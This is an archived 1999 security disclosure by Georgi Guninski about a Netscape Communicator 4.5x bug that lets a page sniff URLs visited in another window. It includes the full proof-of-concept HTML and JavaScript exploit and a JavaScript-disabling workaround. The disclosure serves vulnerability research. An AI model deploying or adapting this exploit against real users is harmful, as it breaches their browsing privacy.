Vulners
Lucene search
netscape.4.51.url.sniffing.txt
`Date: Thu, 25 Mar 1999 20:07:52 +0200
From: Georgi Guninski <[email protected]>
To: [email protected]
Subject: Netscape Communicator 4.51 allows sniffing of URLs from another window
There is a bug in Netscape Communicator 4.51,4.5/Win95, 4.08/WinNT
(probably others?), which allows sniffing URLs from another window.
The exploit uses the ability to execute JavaScript code from specially
designed URLs in the javascript console window, when an error is deliberately
invoked.
Demonstration and source is available at:
http://www.nat.bg/~joro/b11.html
(The exploit does not work if you are behind some versions of a squid proxy.
If you do not see your URL in a message box, try reloading the main page).
Workaround: Disable JavaScript.
Regards,
Georgi Guninski
----------Demonstration and source----------
http://www.nat.bg/~joro/b11.html
--------------------------------------------
<html>
<head>
<title>Control window</title>
</head>
<frameset cols="0,*">
<frame src="wysiwyg://1/file:///?<SCRIPT>s='Your URL is: '+document.links[document.links.length-2];alert(s);top.MochaOutput.location = 'javascript:@clear';top.close();</SCRIPT>" name="err">
<frame src="b11main.html">
</frameset>
</html>
--------------------------------------------
http://www.nat.bg/~joro/b11main.html
--------------------------------------------
<HTML>
<HEAD><TITLE>
Control Window
</TITLE></HEAD>
<SCRIPT>
tracked=window.open();
tracked.document.open();
tracked.document.write("<HTML><HEAD><TITLE>Tracked window</TITLE></HEAD>");
tracked.document.write("There is a bug in Netscape Communicator 4.51,4.5/Win95, 4.08/WinNT (probably others?), which allows sniffing URLs from another window.<BR>");
tracked.document.write("Type your URL in the location bar or choose a bookmark.<BR>");
tracked.document.write("Wait until the document is loaded, then click 'Show URL' in the 'Control window'.<BR>");
tracked.document.write("This exploit needs Javascript enabled.<BR>");
tracked.document.close();
function show()
{
tracked.location="javascript:error";
top.err.location="javascript:error";
top.err.location="javascript:";
}
</SCRIPT>
There is a bug in Netscape Communicator 4.51,4.5/Win95, 4.08/WinNT (probably others?), which allows sniffing URLs from another window.<BR>
This page tracks the URLs the user visits in another window.<BR>
Enter your URL in the 'Tracked window'. Wait until the document is loaded, then click 'Show URL'.<BR>
This exploit needs Javascript enabled.<BR>
Workaround: Disable Javascript.
<FORM>
<INPUT TYPE=BUTTON VALUE="Show URL" onclick="setTimeout('show()',1000)">
</FORM>
<HR>
Written by <A HREF="http://www.nat.bg/~joro">Georgi Guninski</A>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Aug 1999 00:00Current
7.4High risk
Vulners AI Score7.4